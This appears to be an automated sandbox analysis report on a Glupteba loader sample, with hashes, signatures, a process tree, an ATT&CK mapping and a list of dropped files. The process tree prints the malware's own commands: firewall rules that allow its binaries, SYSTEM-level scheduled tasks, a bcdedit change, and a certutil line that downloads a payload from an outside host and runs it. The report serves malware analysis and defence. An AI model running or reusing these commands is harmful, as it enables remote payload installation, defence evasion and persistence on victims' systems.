Overview

overview

10

Static

static

16846abf51...b8.exe

windows7_x64

10

16846abf51...b8.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    186s
  • max time network
    203s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 11:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    16846abf51f5231ce06d60e290aad3422bc1ba6d5127772b54db6672a79081b8.exe

  • Size

    3.8MB

  • MD5

    67193ac8dc016383805c5f0782712fba

  • SHA1

    a48bb38fa579501b9e28572be7cd99012db3eefd

  • SHA256

    16846abf51f5231ce06d60e290aad3422bc1ba6d5127772b54db6672a79081b8

  • SHA512

    ae51e983ae6f7993fe9bbeb17f769820b030ee82c1e836e3cf4b0d16e1aeda78674b3f9fefa8b6dfc8fa263abaed3a117b56f9f861b0dbae04623721b9ecbf90

Score
10/10
gluptebadiscoverydropperevasionloaderpersistence

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba Payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\16846abf51f5231ce06d60e290aad3422bc1ba6d5127772b54db6672a79081b8.exe
    "C:\Users\Admin\AppData\Local\Temp\16846abf51f5231ce06d60e290aad3422bc1ba6d5127772b54db6672a79081b8.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2888
    • C:\Users\Admin\AppData\Local\Temp\16846abf51f5231ce06d60e290aad3422bc1ba6d5127772b54db6672a79081b8.exe
      "C:\Users\Admin\AppData\Local\Temp\16846abf51f5231ce06d60e290aad3422bc1ba6d5127772b54db6672a79081b8.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4696
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4940
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b.exe" enable=yes
          4⤵
            PID:1600
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3028
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
            4⤵
              PID:2080
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3084
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:2164
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:4888
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:2892
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:5000
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 600
            3⤵
            • Program crash
            PID:3956
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 976
          2⤵
          • Program crash
          PID:1952
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5116
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2888 -ip 2888
        1⤵
          PID:4684
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4696 -ip 4696
          1⤵
            PID:1332

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Initial Access

          Execution

          Scheduled Task

          1
          T1053

          Persistence

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Scheduled Task

          1
          T1053

          Privilege Escalation

          Scheduled Task

          1
          T1053

          Defense Evasion

          Modify Registry

          2
          T1112

          Install Root Certificate

          1
          T1130

          Credential Access

          Discovery

          Query Registry

          1
          T1012

          Lateral Movement

          Collection

          Exfiltration

          Command and Control

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
            Filesize

            1.7MB

            MD5

            13aaafe14eb60d6a718230e82c671d57

            SHA1

            e039dd924d12f264521b8e689426fb7ca95a0a7b

            SHA256

            f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

            SHA512

            ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

            Download Submit
          • C:\Windows\rss\csrss.exe
            Filesize

            3.8MB

            MD5

            67193ac8dc016383805c5f0782712fba

            SHA1

            a48bb38fa579501b9e28572be7cd99012db3eefd

            SHA256

            16846abf51f5231ce06d60e290aad3422bc1ba6d5127772b54db6672a79081b8

            SHA512

            ae51e983ae6f7993fe9bbeb17f769820b030ee82c1e836e3cf4b0d16e1aeda78674b3f9fefa8b6dfc8fa263abaed3a117b56f9f861b0dbae04623721b9ecbf90

            Download Submit
          • C:\Windows\rss\csrss.exe
            Filesize

            3.8MB

            MD5

            67193ac8dc016383805c5f0782712fba

            SHA1

            a48bb38fa579501b9e28572be7cd99012db3eefd

            SHA256

            16846abf51f5231ce06d60e290aad3422bc1ba6d5127772b54db6672a79081b8

            SHA512

            ae51e983ae6f7993fe9bbeb17f769820b030ee82c1e836e3cf4b0d16e1aeda78674b3f9fefa8b6dfc8fa263abaed3a117b56f9f861b0dbae04623721b9ecbf90

            Download Submit
          • memory/1600-138-0x0000000000000000-mapping.dmp
            Download
          • memory/2080-140-0x0000000000000000-mapping.dmp
            Download
          • memory/2164-146-0x0000000000000000-mapping.dmp
            Download
          • memory/2888-131-0x00000000030F0000-0x00000000037E7000-memory.dmp
            Filesize

            7.0MB

            Download
          • memory/2888-132-0x0000000000400000-0x0000000000DF8000-memory.dmp
            Filesize

            10.0MB

            Download
          • memory/2888-130-0x0000000002D3E000-0x00000000030E5000-memory.dmp
            Filesize

            3.7MB

            Download
          • memory/2892-148-0x0000000000000000-mapping.dmp
            Download
          • memory/3028-139-0x0000000000000000-mapping.dmp
            Download
          • memory/3084-145-0x0000000000400000-0x0000000000DF8000-memory.dmp
            Filesize

            10.0MB

            Download
          • memory/3084-141-0x0000000000000000-mapping.dmp
            Download
          • memory/3084-144-0x0000000003000000-0x00000000033A7000-memory.dmp
            Filesize

            3.7MB

            Download
          • memory/4696-136-0x0000000000400000-0x0000000000DF8000-memory.dmp
            Filesize

            10.0MB

            Download
          • memory/4696-135-0x0000000003060000-0x0000000003757000-memory.dmp
            Filesize

            7.0MB

            Download
          • memory/4696-134-0x0000000002CAF000-0x0000000003056000-memory.dmp
            Filesize

            3.7MB

            Download
          • memory/4696-133-0x0000000000000000-mapping.dmp
            Download
          • memory/4888-147-0x0000000000000000-mapping.dmp
            Download
          • memory/4940-137-0x0000000000000000-mapping.dmp
            Download
          • memory/5000-150-0x0000000000000000-mapping.dmp
            Download